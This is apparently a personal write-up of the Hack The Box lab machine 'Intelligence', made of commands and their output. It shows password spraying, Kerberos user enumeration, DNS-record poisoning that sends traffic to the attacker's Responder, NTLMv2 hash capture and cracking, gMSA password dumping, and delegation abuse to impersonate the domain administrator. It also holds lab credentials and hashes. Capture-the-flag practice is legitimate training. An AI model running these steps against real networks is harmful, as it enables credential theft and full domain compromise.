HTB Intelligence done
Intelligence¶
OS:¶
Windows
Technology:¶
Active Directory
IP Address:¶
10.10.10.248
Open ports:¶
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-22 12:14:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Users and pass:¶
Tiffany.Molina
NewIntelligenceCorpUser9876
Ted.Graves
Mr.Teddy
Password from metadata (pdf files)
NewIntelligenceCorpUser9876
Nmap¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat 10.10.10.248_nmap_vulns.nmap
# Nmap 7.93 scan initiated Sat Apr 22 01:12:02 2023 as: nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.248_nmap_vulns 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-server-header: Microsoft-IIS/10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-22 12:14:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-22T12:19:41+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-22T12:15:22
|_ start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_smb-vuln-ms10-054: false
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 37.72 ms 10.10.14.1
2 38.12 ms 10.10.10.248
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 22 01:19:46 2023 -- 1 IP address (1 host up) scanned in 464.30 seconds
Add hostname to /etc/hosts¶
┌──(root㉿kali)-[~]
└─# echo "10.10.10.248 intelligence.htb0" >> /etc/hosts
┌──(root㉿kali)-[~]
└─# cat /etc/hosts | grep intellige
1.10.10.248 intelligence.htb0
Check page source¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ curl -sk http://10.10.10.248/ | grep "upload" | tr -d " "
<pclass="mb-0text-white-50"><ahref="documents/2020-01-01-upload.pdf"class="badgebadge-secondary">Download</a></p>
<pclass="mb-0text-white-50"><ahref="documents/2020-12-15-upload.pdf"class="badgebadge-secondary">Download</a></p>
Get metadata from all pdf files¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ python3 findpdfs.py | tee findpdfs_dumps
===http://10.10.10.248/documents/2020-06-04-upload.pdf===
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
===http://10.10.10.248/documents/2020-12-30-upload.pdf===
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.
Users enumeration via Kerberos¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ /tmp/kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/04/23 - Ronnie Flathers @ropnop
2023/05/04 09:44:56 > Using KDC(s):
2023/05/04 09:44:56 > 10.10.10.248:88
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > Done! Tested 30 usernames (30 valid) in 0.118 seconds
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
List users name¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ /tmp/kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/users | awk '{print $NF}' | grep htb > kerberos_users
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat kerberos_users
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Password spraying¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
Show shares for user: Tiffany.Molina¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445 Name: intelligence.htb0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
Read flag: user.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/Users
Password for [WORKGROUP\Tiffany.Molina]:
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/Users
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> cd Tiffany.Molina\Desktop
smb: \Tiffany.Molina\Desktop\> dir
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Thu May 4 14:40:22 2023
3770367 blocks of size 4096. 1461734 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> exit
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat user.txt
c2e88eb77a1141f1bc6111e2caf5ed1f
lateral Movement¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445 Name: intelligence.htb0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/IT
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1446959 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.8 KiloBytes/sec) (average 5.8 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat downdetector.ps1
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Add DNS records - dnstools.py¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ git clone https://github.com/dirkjanm/krbrelayx
Cloning into 'krbrelayx'...
remote: Enumerating objects: 183, done.
remote: Counting objects: 100% (85/85), done.
remote: Compressing objects: 100% (60/60), done.
remote: Total 183 (delta 42), reused 55 (delta 24), pack-reused 98
Receiving objects: 100% (183/183), 114.63 KiB | 729.00 KiB/s, done.
Resolving deltas: 100% (90/90), done.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cd krbrelayx
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a modify -r web1 -d 10.10.14.7 -t A
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Modifying record
[+] LDAP operation completed successfully
Run Responder¶
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[!] Responder must be run as root.
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.7]
Responder IPv6 [dead:beef:2::1005]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MEE58TXDG0E]
Responder Domain Name [JLYI.LOCAL]
Responder DCE-RPC Port [49772]
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a5a6266b262713a4:8ED592BE3A754EEBF46DBC228FC8C792:0101000000000000B4F031E8707FD9017D4ED97E8679A78900000000020008004A004C005900490001001E00570049004E002D004D004500450035003800540058004400470030004500040014004A004C00590049002E004C004F00430041004C0003003400570049004E002D004D0045004500350038005400580044004700300045002E004A004C00590049002E004C004F00430041004C00050014004A004C00590049002E004C004F00430041004C000800300030000000000000000000000000200000D1E66AAE14C4369510F7BD91142D7DD511E56062C0501C03E3886642042004640A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
Cracking hash¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ nano ted_graves_hash_kerberos
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ted_graves_hash_kerberos
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:05 DONE (2023-05-05 05:47) 0.1712g/s 1851Kp/s 1851Kc/s 1851KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Privilage Escalation¶
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/bloodhound]
└─$ bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (intelligence.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.203 seconds: Server 10.10.10.248 UDP port 53 answered The DNS operation timed out.; Server 10.10.10.248 UDP port 53 answered The DNS operation timed out.
INFO: Done in 00M 07S
Enumerate Bloodhood¶
Ted.Graves is in the ITSupport group, which has ReadGMSAPassword on SVC_INT. Even more interestingly, if I use the pre-built query “Shortest Path from Owned Principles”, the svc_int account has AllowedToDelegate on the DC:w
Download gMSADumper¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ wget https://github.com/micahvandeusen/gMSADumper/archive/refs/heads/main.zip
--2023-05-08 06:51:16-- https://github.com/micahvandeusen/gMSADumper/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/micahvandeusen/gMSADumper/zip/refs/heads/main [following]
--2023-05-08 06:51:16-- https://codeload.github.com/micahvandeusen/gMSADumper/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.9
Connecting to codeload.github.com (codeload.github.com)|140.82.121.9|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’
main.zip [ <=> ] 16.66K --.-KB/s in 0.02s
2023-05-08 06:51:17 (726 KB/s) - ‘main.zip’ saved [17061]
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ unzip main.zip -d gMSADumper
Archive: main.zip
cbc13e034906331213b4575ee4e3d42f8bb7d5de
creating: gMSADumper/gMSADumper-main/
inflating: gMSADumper/gMSADumper-main/.gitignore
inflating: gMSADumper/gMSADumper-main/COPYING
inflating: gMSADumper/gMSADumper-main/README.md
extracting: gMSADumper/gMSADumper-main/__init__.py
inflating: gMSADumper/gMSADumper-main/gMSADumper.py
extracting: gMSADumper/gMSADumper-main/requirements.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
Get and create ticket¶
Get SPN name¶
¶
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ sudo ntpdate -s 10.10.10.248
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
>DC$
>itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114
Craft ticket for SPN¶
──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ sudo ntpdate -s 10.10.10.248
[sudo] password for kali:
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
>DC$
>itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ /home/kali/.local/bin/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :fca9edf1c9fb8f031dfc38d918279642 -impersonate administrator intelligence.htb/svc_int
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Login as administrator¶
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ export KRB5CCNAME=administrator.ccache
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ /home/kali/.local/bin/wmiexec.py -k -no-pass dc.intelligence.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
